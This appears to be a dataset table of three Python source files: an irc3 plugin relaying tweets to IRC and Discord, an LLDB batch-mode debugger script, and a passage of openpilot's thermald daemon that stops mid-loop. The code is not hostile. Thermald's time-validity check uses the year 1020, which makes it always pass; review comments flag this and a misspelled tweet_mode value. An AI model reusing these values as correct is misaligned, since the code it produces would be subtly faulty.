source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
tweets.py | # -*- coding: utf-8 -*-
import html
import threading
import time
import irc3
import json
import requests
from irc3.plugins.command import command
from irc3.utils import as_list
from twitter.stream import Timeout, HeartbeatTimeout, Hangup
__doc__ = '''
==========================================
:mod:`tweets` Feeds plugin
==========================================
Post Twitter Updates into channels.
You must configure `irc3.plugins.social` properly.
Additionally, your config has to contain something like this:
[tweets]
## Optional: default channel
tweet_channels = #channel
## Optional: customize message in channel
tweet_format = "@{screen_name}: {text}"
## some twitter feeds:
identifier.account = screen_name
identifier.channels = #channel1 #channel2
## these are just for Discord
webhook_username = Username shown as bot name
webhook_avatar = https://... (URL to an avatar image)
identifier.webhook = https://discordapp.com/api/webhooks/...
[...]
'''
@irc3.plugin
class Tweets:
"""Relay Twitter statuses of configured accounts into IRC channels and Discord webhooks."""
requires = [
'irc3.plugins.social',
]
def __init__(self, bot):
"""Read the [tweets] config section and prepare per-account routing tables."""
self.bot = bot
# Streaming connection (statuses/filter) and REST client, both supplied
# by irc3.plugins.social.
self.twitter_stream = self.bot.get_social_connection(id='twitter_stream')
self.twitter_api = self.bot.get_social_connection(id='twitter')
# Keyed by lowercased screen name: target channels, webhook URL, filters.
# twitter_ids maps numeric user id (str) -> screen name.
self.twitter_channels = {}
self.twitter_ids = {}
self.twitter_webhooks = {}
self.twitter_filters = {}
self.twitter_connected = False
self.config = self.bot.config.get(__name__, {})
# Defaults applied to every account unless overridden per identifier.
self.tweet_channels = as_list(self.config.get('tweet_channels'))
self.tweet_format = self.config.get('tweet_format', '@{screen_name}: {text}')
# Optional Discord webhook presentation overrides.
self.webhook_username = self.config.get('webhook_username')
self.webhook_avatar = self.config.get('webhook_avatar')
def connect_twitter(self):
"""Resolve configured accounts to Twitter ids and start the stream thread."""
for config_key, config_value in self.config.items():
if config_value and str(config_key).endswith('.account'):
screen_name = config_value
# The streaming API follows numeric ids, so look each account up once.
details = self.twitter_api.users.show(screen_name=screen_name)
self.twitter_ids[details["id_str"]] = screen_name
self.twitter_channels[screen_name.lower()] = self.tweet_channels
# Strip the trailing '.account' (8 chars) to recover the identifier.
config_id = config_key[:-8]
if self.config.get(config_id + '.channels'):
self.twitter_channels[screen_name.lower()] = as_list(self.config.get(config_id+'.channels'))
self.twitter_webhooks[screen_name.lower()] = self.config.get(config_id+'.webhook')
self.twitter_filters[screen_name.lower()] = as_list(self.config.get(config_id+'.filters'))
# Consume the stream on a background thread so the bot loop stays responsive.
threading.Thread(target=self.receive_stream).start()
def receive_stream(self):
"""Consume the Twitter streaming API forever, reconnecting with backoff.

Runs on a dedicated thread; every item received is handed to
handle_data() on the bot's executor.
"""
exception_count = 0
loop_count = 0
while True:
try:
# Follow all configured accounts by numeric id.
follow = ','.join(self.twitter_ids.keys())
stream = self.twitter_stream.statuses.filter(follow=follow)
self.twitter_connected = True
self.bot.log.info('Twitter connected')
self.bot.log.info('IDs: %s' % follow)
for tweet in stream:
# Process off-thread so slow handling cannot stall the stream.
self.bot.loop.run_in_executor(None, self.handle_data, tweet)
self.bot.log.info('Twitter disconnected')
except Exception as e:
self.bot.log.info('Twitter connection lost')
# NOTE(review): exception_count is never reset, so this backoff grows
# for the lifetime of the thread — confirm this is intended.
exception_count = exception_count + 1
self.bot.log.info('Twitter EXCEPTION %d' % exception_count)
self.bot.log.exception(e)
time.sleep(10 * exception_count)
finally:
# Always pause before reconnecting to avoid hammering the API.
loop_count = loop_count + 1
time.sleep(20 + loop_count)
self.bot.log.info('Twitter connection retrying')
self.twitter_connected = False
def handle_data(self, data):
"""Dispatch one stream item: control sentinels, retweets, deletions, tweets."""
if data is None:
self.bot.log.info('Twitter sent no data')
elif data is Timeout:
# Timeout/Hangup/HeartbeatTimeout are sentinel objects from
# twitter.stream, compared by identity.
self.bot.log.info('Twitter sent a timeout')
elif data is Hangup:
self.bot.log.info('Twitter sent a hangup')
elif data is HeartbeatTimeout:
self.bot.log.info('Twitter sent a heartbeat timeout')
elif 'retweeted_status' in data:
# Retweets are logged but never relayed.
self.bot.log.debug('Twitter sent retweet %s' % data['id_str'])
elif 'delete' in data:
delete_user = data['delete']['status']['user_id_str']
if delete_user in self.twitter_ids:
delete_user = '@%s' % self.twitter_ids[delete_user]
self.bot.log.debug('Twitter sent deletion %s/%s' % (delete_user, data['delete']['status']['id_str']))
elif 'limit' in data:
# Rate limiting notice: tweets were dropped upstream.
self.bot.log.critical('Twitter sent LIMIT NOTICE')
self.bot.log.info(json.dumps(data))
elif 'text' in data:
self.bot.log.debug('Twitter sent tweet @%s/%s' % (data['user']['screen_name'], data['id_str']) )
self.handle_tweet(data)
#self.bot.log.debug(json.dumps(data))
else:
self.bot.log.warn('Twitter sent unknown data')
self.bot.log.info(json.dumps(data))
def handle_tweet(self, tweet):
    """Format a tweet and deliver it to the configured channels and webhook.

    Tweets are dropped when they are replies directed at another account,
    or when they fail the per-user keyword filter (text_filtered).
    """
    screen_name = tweet['user']['screen_name']
    user_name = tweet['user']['name']
    url = 'https://twitter.com/%s/status/%s' % (screen_name, tweet['id_str'])
    text = html.unescape(tweet['text'])
    # Prefer the untruncated text when the extended form is present.
    if 'extended_tweet' in tweet and 'full_text' in tweet['extended_tweet']:
        text = html.unescape(tweet['extended_tweet']['full_text'])
    user = screen_name.lower()
    # Deliver only if the account is configured, the tweet is not a reply to
    # someone else (self-replies/threads are allowed), and the filter passes.
    user_tweet = (user in self.twitter_channels or user in self.twitter_webhooks) \
        and (tweet['in_reply_to_screen_name'] is None or tweet['in_reply_to_screen_name'].lower() == user) \
        and (not text.startswith('@') or text.lower().startswith('@' + user)) \
        and (not self.text_filtered(user, text))
    if not user_tweet:
        self.bot.log.debug('Ignored reply or filtered message %s' % url)
        return
    if user in self.twitter_channels:
        for tweet_channel in self.twitter_channels[user]:
            self.bot.privmsg(tweet_channel,
                self.tweet_format.format(
                    screen_name=screen_name, user_name=user_name, text=text, tweet=tweet, url=url))
        self.bot.log.debug('Sent tweet %s to %s' % (url, ' '.join(self.twitter_channels[user])))
    # .get(): an account may have channels configured without a webhook,
    # so a plain [user] lookup could raise KeyError here.
    if self.twitter_webhooks.get(user):
        self.send_webhook(self.twitter_webhooks[user], screen_name, user_name, text, tweet, url)
def text_filtered(self, user, text):
    """Return True when *text* should be suppressed for *user*.

    The configured filters act as required keywords: the tweet passes
    (returns False) as soon as any term occurs in it, and is filtered
    out (returns True) when none of the configured terms match.
    """
    terms = self.twitter_filters.get(user)
    if not terms:
        # No filter list configured for this account: never filter.
        return False
    lowered = text.lower()
    for term in terms:
        # A single matching required term keeps the tweet.
        if term.lower() in lowered:
            return False
    return True
def send_webhook(self, webhook, screen_name, user_name, text, tweet, url):
"""Post the tweet as Discord embeds to *webhook*. Never raises: failures
are logged and swallowed so IRC delivery is unaffected."""
try:
message = {'embeds': []}
if self.webhook_username:
message['username'] = self.webhook_username
if self.webhook_avatar:
message['avatar_url'] = self.webhook_avatar
# First embed carries the tweet text, link and author thumbnail.
text_message = {
'description': text,
'url': url,
'title': '@%s' % screen_name,
'color': 33972, #alternative: 44269
'thumbnail': {
'url': tweet['user']['profile_image_url_https']
}
}
message['embeds'].append(text_message)
# Look for the best place to get media
media_base = tweet
if 'extended_tweet' in tweet:
media_base = tweet['extended_tweet']
media = []
if 'extended_entities' in media_base and 'media' in media_base['extended_entities']:
media = media_base['extended_entities']['media']
elif 'entities' in media_base and 'media' in media_base['entities']:
media = media_base['entities']['media']
for medium in media:
# First medium is attached to the text embed; once that embed already
# carries an image/video, each further medium gets its own embed.
media_message = text_message
if 'image' in text_message or 'video' in text_message:
media_message = {'url': url}
message['embeds'].append(media_message)
if 'media_url' in medium:
media_message['image'] = { 'url': medium['media_url'] }
# Prefer the https variant when both are present (overwrites above).
if 'media_url_https' in medium:
media_message['image'] = { 'url': medium['media_url_https'] }
# Videos are not supported yet, but who knows?
if 'video_info' in medium and 'variants' in medium['video_info'] \
and len(medium['video_info']['variants']) > 0 \
and 'url' in medium['video_info']['variants'][0]:
media_message['video'] = {'url': medium['video_info']['variants'][0]['url']}
# Until then at least mark the videos
if medium['type'] != 'photo':
if medium['type'] == 'animated_gif':
media_message['footer'] = {'text': '🎞️ GIF'}
elif medium['type'] == 'video':
media_message['footer'] = {'text': '🎞️ Video'}
else:
media_message['footer'] = {'text': '🎞️ ?'}
#self.bot.log.debug(json.dumps(message))
# Discord answers 204 No Content on success; log anything else.
reply = requests.post(webhook, json=message)
if reply.status_code != 204:
self.bot.log.info(webhook)
self.bot.log.info(json.dumps(message))
self.bot.log.info(reply)
self.bot.log.debug('Sent tweet %s to %s' % (url, webhook))
except Exception as e:
self.bot.log.exception(e)
def connection_made(self):
    """IRC connection hook: start the Twitter stream once, on first connect."""
    if self.twitter_connected:
        return
    self.connect_twitter()
@command(permission='admin')
def status(self, mask, target, args):
"""Handle a specific tweet (again)
%%status <id>
"""
status_id = args['<id>']
self.bot.log.info('Fetching and handling tweet: %s' % status_id)
# NOTE(review): "compability" looks like a typo — the API's tweet_mode
# accepts values like "compat"/"extended"; confirm the intended value.
tweet = self.twitter_api.statuses.show(id=status_id, include_entities="true", tweet_mode="compability")
# Graft the extended (untruncated) payload on, so handle_tweet prefers it.
tweet['extended_tweet'] = self.twitter_api.statuses.show(id=status_id, include_entities="true", tweet_mode="extended")
self.bot.log.debug(json.dumps(tweet))
self.handle_tweet(tweet)
return 'Loaded and handled tweet: @%s/%s' % (tweet['user']['screen_name'], tweet['id_str'])
|
lldb_batchmode.py | # This script allows to use LLDB in a way similar to GDB's batch mode. That is, given a text file
# containing LLDB commands (one command per line), this script will execute the commands one after
# the other.
# LLDB also has the -s and -S commandline options which also execute a list of commands from a text
# file. However, these commands are executed `immediately`: the commands following a `run` or
# `continue` command will be executed immediately after the `run` or `continue`, without waiting
# for the next breakpoint to be hit. Thus a command sequence like the following will not yield
# reliable results:
#
# break 11
# run
# print x
#
# Most of the time the `print` command will be executed while the program is still running and will
# thus fail. Using this Python script, the above will work as expected.
from __future__ import print_function
import lldb
import os
import sys
import threading
import re
import time
try:
import thread
except ModuleNotFoundError:
# The `thread` module was renamed to `_thread` in Python 3.
import _thread as thread
# Set this to True for additional output
DEBUG_OUTPUT = False
def print_debug(s):
    """Emit *s* on stdout with a "DEBUG: " prefix when DEBUG_OUTPUT is enabled."""
    # Reading a module-level global needs no `global` declaration.
    if DEBUG_OUTPUT:
        print("DEBUG: " + str(s))
def normalize_whitespace(s):
    """Replace newlines, tabs, multiple spaces, etc with exactly one space."""
    # Use a raw string: "\s" in a plain literal is an invalid escape sequence
    # (DeprecationWarning today, an error in future Python versions).
    return re.sub(r"\s+", " ", s)
def breakpoint_callback(frame, bp_loc, dict):
"""This callback is registered with every breakpoint and makes sure that the
frame containing the breakpoint location is selected

Registered via `breakpoint command add -F breakpoint_callback` in
execute_command(); LLDB invokes it with the stopped frame and location.
"""
print("Hit breakpoint " + str(bp_loc))
# Select the frame and the thread containing it
frame.thread.process.SetSelectedThread(frame.thread)
frame.thread.SetSelectedFrame(frame.idx)
# Returning True means that we actually want to stop at this breakpoint
return True
# This is a list of breakpoints that are not registered with the breakpoint callback. The list is
# populated by the breakpoint listener and checked/emptied whenever a command has been executed
new_breakpoints = []
# This set contains all breakpoint ids that have already been registered with a callback, and is
# used to avoid hooking callbacks into breakpoints more than once
registered_breakpoints = set()
def execute_command(command_interpreter, command):
"""Executes a single CLI command

Prints the command and its (whitespace-normalized) output, then hooks the
breakpoint callback into any breakpoints the command created.
"""
global new_breakpoints
global registered_breakpoints
res = lldb.SBCommandReturnObject()
# Echo the command so the transcript reads like an interactive session.
print(command)
command_interpreter.HandleCommand(command, res)
if res.Succeeded():
if res.HasResult():
print(normalize_whitespace(res.GetOutput() or ''), end='\n')
# If the command introduced any breakpoints, make sure to register
# them with the breakpoint
# callback
while len(new_breakpoints) > 0:
res.Clear()
breakpoint_id = new_breakpoints.pop()
if breakpoint_id in registered_breakpoints:
print_debug("breakpoint with id %s is already registered. Ignoring." %
str(breakpoint_id))
else:
print_debug("registering breakpoint callback, id = " + str(breakpoint_id))
callback_command = ("breakpoint command add -F breakpoint_callback " +
str(breakpoint_id))
command_interpreter.HandleCommand(callback_command, res)
if res.Succeeded():
print_debug("successfully registered breakpoint callback, id = " +
str(breakpoint_id))
registered_breakpoints.add(breakpoint_id)
else:
print("Error while trying to register breakpoint callback, id = " +
str(breakpoint_id))
else:
# Surface LLDB's own error text for failed commands.
print(res.GetError())
def start_breakpoint_listener(target):
"""Listens for breakpoints being added and adds new ones to the callback
registration list

Spawns a daemon thread whose listener is subscribed to the target's
breakpoint-changed broadcast events.
"""
listener = lldb.SBListener("breakpoint listener")
def listen():
event = lldb.SBEvent()
try:
while True:
# 120s timeout keeps the loop responsive to interpreter shutdown.
if listener.WaitForEvent(120, event):
if lldb.SBBreakpoint.EventIsBreakpointEvent(event) and \
lldb.SBBreakpoint.GetBreakpointEventTypeFromEvent(event) == \
lldb.eBreakpointEventTypeAdded:
global new_breakpoints
breakpoint = lldb.SBBreakpoint.GetBreakpointFromEvent(event)
print_debug("breakpoint added, id = " + str(breakpoint.id))
new_breakpoints.append(breakpoint.id)
except:
print_debug("breakpoint listener shutting down")
# Start the listener and let it run as a daemon
listener_thread = threading.Thread(target=listen)
listener_thread.daemon = True
listener_thread.start()
# Register the listener with the target
target.GetBroadcaster().AddListener(listener, lldb.SBTarget.eBroadcastBitBreakpointChanged)
def start_watchdog():
    """Starts a watchdog thread that will terminate the process after a certain
    period of time (30 seconds) by interrupting the main thread."""
    # time.clock() was removed in Python 3.8; time.monotonic() is the correct
    # replacement for measuring elapsed wall time unaffected by clock changes.
    watchdog_start_time = time.monotonic()
    watchdog_max_time = watchdog_start_time + 30
    def watchdog():
        # Poll once per second; raise KeyboardInterrupt in the main thread
        # when the deadline passes.
        while time.monotonic() < watchdog_max_time:
            time.sleep(1)
        print("TIMEOUT: lldb_batchmode.py has been running for too long. Aborting!")
        thread.interrupt_main()
    # Start the watchdog and let it run as a daemon
    watchdog_thread = threading.Thread(target=watchdog)
    watchdog_thread.daemon = True
    watchdog_thread.start()
####################################################################################################
# ~main
####################################################################################################
# ~main: parse argv, start the watchdog, and create the debugger + target.
if len(sys.argv) != 3:
print("usage: python lldb_batchmode.py target-path script-path")
sys.exit(1)
target_path = sys.argv[1]
script_path = sys.argv[2]
print("LLDB batch-mode script")
print("----------------------")
print("Debugger commands script is '%s'." % script_path)
print("Target executable is '%s'." % target_path)
print("Current working directory is '%s'" % os.getcwd())
# Start the timeout watchdog
start_watchdog()
# Create a new debugger instance
debugger = lldb.SBDebugger.Create()
# When we step or continue, don't return from the function until the process
# stops. We do this by setting the async mode to false.
debugger.SetAsync(False)
# Create a target from a file and arch
print("Creating a target for '%s'" % target_path)
target_error = lldb.SBError()
target = debugger.CreateTarget(target_path, None, None, True, target_error)
if not target:
print("Could not create debugging target '" + target_path + "': " +
str(target_error) + ". Aborting.", file=sys.stderr)
sys.exit(1)
# Register the breakpoint callback for every breakpoint
start_breakpoint_listener(target)
command_interpreter = debugger.GetCommandInterpreter()
# Execute the script's commands one by one, pausing before a "run" so that
# breakpoint-added events can be processed first.
try:
    # `with` closes the file on every path; the original closed it in
    # `finally`, which raised NameError when open() itself failed.
    with open(script_path, 'r') as script_file:
        for line in script_file:
            command = line.strip()
            # "run"/"r"/"process launch ..." is about to start the target.
            if command == "run" or command == "r" or re.match(r"^process\s+launch.*", command):
                # Before starting to run the program, let the thread sleep a bit, so all
                # breakpoint added events can be processed
                time.sleep(0.5)
            if command != '':
                execute_command(command_interpreter, command)
except IOError as e:
    print("Could not read debugging script '%s'." % script_path, file=sys.stderr)
    print(e, file=sys.stderr)
    print("Aborting.", file=sys.stderr)
    sys.exit(1)
finally:
    debugger.Terminate()
|
thermald.py | #!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import EonFanController, UnoFanController, TiciFanController
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
    """Populate the global mapping of thermal-zone "type" name -> zone index."""
    global tz_by_type
    tz_by_type = {}
    base = "/sys/devices/virtual/thermal"
    for entry in os.listdir(base):
        # Only thermal_zone<N> directories are of interest.
        if not entry.startswith("thermal_zone"):
            continue
        with open(os.path.join(base, entry, "type")) as f:
            zone_name = f.read().strip()
        tz_by_type[zone_name] = int(entry.lstrip("thermal_zone"))
def read_tz(x):
    """Return the raw reading of thermal zone *x*; 0 when *x* is None or the
    zone does not exist. *x* may be a numeric index or a /sys "type" name."""
    if x is None:
        return 0
    if isinstance(x, str):
        # A name selects the zone via its /sys "type"; resolve it lazily.
        if tz_by_type is None:
            populate_tz_by_type()
        x = tz_by_type[x]
    path = f"/sys/devices/virtual/thermal/thermal_zone{x}/temp"
    try:
        with open(path) as f:
            raw = f.read()
    except FileNotFoundError:
        return 0
    return int(raw)
def read_thermal(thermal_config):
"""Build a fresh 'deviceState' message populated with scaled temperatures.

Each thermal_config entry pairs zone identifier(s) with a divisor that
converts the raw /sys reading into degrees C.
"""
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
"""Forward to set_offroad_alert() only when the alert's state changed."""
# Deduplicate: skip if this alert is already in the requested state.
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue

Loops every DT_TRML until *end_event* is set; every ~10s it samples
network/modem/NVMe state and publishes a HardwareState to *hw_queue*.
"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
# Reuse the last reading when the modem transiently reports none.
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if TICI and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version()  # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv()  # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
)
try:
# Queue has maxsize=1; drop this sample if the consumer is behind.
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
# Stuck in "REGISTERED" for >10 samples: kick the LTE connection.
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
"""Main thermald loop: publish deviceState and drive onroad/offroad state.

Runs every DT_TRML until *end_event* is set. Reads panda/peripheral state,
temperatures and the latest HardwareState from *hw_queue*, computes the
thermal band and fan target, evaluates the startup/onroad conditions, and
manages power monitoring and shutdown.
"""
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
fan_controller = TiciFanController()
elif is_uno or PC:
fan_controller = UnoFanController()
else:
fan_controller = EonFanController()
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
# Smoothed maximum component temperature drives the thermal band below.
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
# Hysteresis: stay in the current band until a bound is crossed, then
# step to the adjacent band in THERMAL_BANDS order.
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
# NOTE(review): "1020" looks like a typo for 2020 — confirm the intended
# minimum valid year for the time_valid check.
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = (now.year > 1020) or (now.year == 1020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
# Mirror the engagement transition into the kernel log (best effort).
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw()  # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90  # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
